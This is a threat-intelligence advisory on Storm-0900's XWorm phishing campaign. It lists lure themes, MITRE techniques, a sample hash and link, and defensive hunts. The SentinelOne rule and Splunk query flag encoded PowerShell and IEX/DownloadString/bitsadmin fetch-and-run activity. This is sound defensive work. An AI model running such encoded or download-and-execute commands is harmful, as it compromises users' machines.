Storm-0900 XWorm Phishing Campaign
Targeted sectors
· General users
o Likely cross-sector, focused on credential harvesting and general compromise.
Countries
Primarily United States.
BLUF
High-volume phishing emails using parking ticket and medical test themes trick users into running malicious PowerShell scripts to install XWorm malware.
Date of first reported activity
· Observed and blocked by Microsoft on November 26, 2025.
Date of last reported activity update
· December 10, 2025.
APT names
· None specified
Associated criminal organization names
· Storm-0900 (Microsoft naming convention for an activity cluster).
IOCs
Key C2 Infrastructure Characteristics
· Dynamic and Evasive: Storm-0900 is known for its high-volume, weekly campaigns that leverage "agile" infrastructure which is constantly rotated to evade detection.
· Abuse of Legitimate Services: The group frequently uses legitimate infrastructure for parts of its attack chain, making simple domain blocking difficult.
· AWS URLs: Recent campaigns (observed in November 2025) used unique Amazon Web Services (AWS) URLs for the initial landing pages that hosted the "ClickFix" social engineering lures. These are not fixed C2 domains but temporary file hosting links.
· Public DNS over HTTPS (DoH) Resolvers: The XWorm malware uses legitimate DoH services (like Cloudflare's 1.1.1.1 or Google's 8.8.8.8) to resolve its actual hard-coded C2 addresses in an encrypted manner, further hiding the malicious destination from standard network monitoring.
TTPs:
· T1566.002: Phishing: Spear-phishing Link.
· T1059.001: Command and Scripting Interpreter: PowerShell (Execution via malicious ClickFix step).
· T1204.001: User Execution: Malicious Link.
Malware names
· XWorm (Remote Access Trojan).
Malware sample
sha256
b7b8016b837766fc9a8d6cfeec6239c05778eec6525bc61327b6311427c4a289
URL link to sample
hxxps://bazaar.abuse.ch/sample/b7b8016b837766fc9a8d6cfeec6239c05778eec6525bc61327b6311427c4a289/
CVEs and CVSS Vectors
· Not applicable
Nessus ID
· Not applicable
Suggested rules / potential hunts
Suggested Suricata rules
Look for rules detecting common XWorm C2 activity or unusual PowerShell execution network connections.
Suggested SentinelOne rules
Trigger alerts for execution of powershell.exe that contains base64-encoded strings and subsequently initiates network connections to unusual domains or IPs.
Suspicious PowerShell Base64String Execution
event.type == "Process Creation" AND
tgt.process.name contains "powershell.exe" AND
(tgt.process.cmdline contains "-encodedcommand" OR
tgt.process.cmdline contains "-enc" OR
tgt.process.cmdline contains "-nop" OR
tgt.process.cmdline contains "-c") AND
tgt.process.cmdline contains "FromBase64String"
Suggested Splunk hunts
index=[your_windows_logs] "powershell.exe" | where like(_raw, "%(IEX|DownloadString|bitsadmin)%") (Monitor for obfuscated PowerShell commands related to file transfer).
Delivery method
High-volume phishing emails using social engineering.
Email samples
Themes
Emails use urgent or curiosity-inducing social engineering themes.
"Parking Ticket" notifications, sometimes referencing local law enforcement.
"Medical Test Result" notifications, sometimes referencing government health agencies or specific healthcare companies.
Generic "Invoice" lures.
Subject Lines: Often personalized or highly relevant to current events (e.g., a campaign around Thanksgiving referenced the holiday).
Sender: Generic salutations (e.g., "Hi") and vague signatures (e.g., "Account Officer") are common.
References
The Hacker News
· hxxps://thehackernews.com/2025/12/threatsday-bulletin-wi-fi-hack-npm-worm.html
MalwareBazaar
· hxxps://bazaar.abuse.ch/sample/b7b8016b837766fc9a8d6cfeec6239c05778eec6525bc61327b6311427c4a289/
X
· hxxps://x.com/MsftSecIntel/status/1995649245408301308
Cyber NJ
· hxxps://www.cyber.nj.gov/Home/Components/News/News/1871/214
MalwareBytes
hxxps://www.malwarebytes.com/blog/threats/2025/11/we-opened-a-fake-invoice-and-fell-down-a-retro-xworm-shaped-wormhole
